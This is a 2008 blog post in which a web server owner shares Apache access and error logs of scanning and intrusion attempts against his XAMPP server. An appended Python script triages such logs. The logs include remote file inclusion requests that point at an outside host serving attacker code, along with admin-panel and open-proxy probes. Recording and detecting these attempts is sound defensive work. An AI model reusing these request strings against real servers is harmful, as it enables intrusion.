Saturday 29 November 2008

File System Security - Part I

Hello,

Today I am going to talk about file system security on a web server, because I got a few attempts to hack my local XAMPP server.

I went to the Apache log and saw something quite interesting:
Access.log:
200.69.177.20 - - [27/Nov/2008:16:19:53 +0000] "GET //user/templates/footer.tpl HTTP/1.1" 404 1122
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /admin/business_inc/saveserver.php?thisdir=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:20:14 +0000] "GET /upload.php HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
222.208.183.218 - - [29/Nov/2008:11:16:36 +0000] "GET http://www.wantsfly.com/prx1.php?hash=047CB197FF160516516CE156005088B4C955CE39C55F HTTP/1.0" 404 1125
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /sqlitemanager/main.php HTTP/1.1" 404 1122
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /SQLiteManager/main.php HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde3//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde-3.0.5//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.6//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.7//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.8//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.9//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /mail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /email//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /webmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /newmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mails//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mailz//README HTTP/1.1" 404 1122
81.180.165.131 - - [05/Dec/2008:08:37:43 +0000] "GET /twiki/ HTTP/1.0" 404 1122
81.180.165.131 - - [05/Dec/2008:09:17:52 +0000] "GET /wiki/ HTTP/1.0" 404 1122
218.58.226.13 - - [07/Dec/2008:07:21:54 +0000] "GET /manager/html HTTP/1.1" 404 1122


And error.log:
[Thu Nov 27 16:19:53 2008] [error] [client 200.69.177.20] File does not exist: F:/xampp/htdocs/user
[Fri Nov 28 09:51:57 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/pr.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/errors.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/admin
[Fri Nov 28 18:20:14 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/upload.php' not found or unable to stat
[Sat Nov 29 11:16:36 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/prx1.php' not found or unable to stat
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/sqlitemanager
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/SQLiteManager
[Wed Dec 03 18:44:21 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/PMA
[Wed Dec 03 18:44:25 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/db
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/dbadmin
[Wed Dec 03 18:44:29 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/web
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpmyadmin2
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysqladmin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql-admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] script 'F:/xampp/htdocs/main.php' not found or unable to stat
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.6
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.4
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.1
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.3
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.6
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/myadmin
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-rc1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.2-rc1
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantisbt
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/tracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtrack
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/support
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bug
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugs
[Thu Dec 04 11:25:04 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantis


So I came to the conclusion that I should not use those files or folders.
Luckily, it is a server for uploading our own tests, so nothing could happen anyway. :)

Whenever I find more security tips I will post them on the blog. I hope it helps to stop hackers.
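
One way to triage an access.log like the one above, as an added example (not code from the original post): it labels each client by the probe patterns visible in the excerpt and lists every request that did not return 404, such as the /phpmyadmin/main.php line that returned 200. The function names, the label names and the three-path threshold are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Common Log Format, as in the access.log excerpt above: client, request target, status.
LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')

# Lines copied from the access.log excerpt in this post.
SAMPLE = """\
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
"""

def classify(target):
    """Label one request target with the probe patterns it matches."""
    labels = set()
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):
        labels.add("proxy-probe")         # absolute URI sent to an origin server
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            labels.add("remote-include")  # a parameter value is a remote URL
    return labels

def triage(log_text, min_paths=3):
    """Return (labels per client, requests that did not return 404)."""
    labels, misses, served = defaultdict(set), defaultdict(set), []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                      # not a Common Log Format line
        client, target, status = m.groups()
        labels[client] |= classify(target)
        if status == "404":
            misses[client].add(target)
        else:
            served.append((client, target, status))  # something answered: review first
    for client, paths in misses.items():
        if len(paths) >= min_paths:       # assumed threshold for this example
            labels[client].add("path-scan")
    return dict(labels), served

if __name__ == "__main__":
    found, served = triage(SAMPLE)
    for client, tags in sorted(found.items()):
        print(client, sorted(tags) or "-")
    print("answered:", served)
```

Requests in the "answered" list deserve attention before the 404 noise, because they show a path that exists and is reachable from outside.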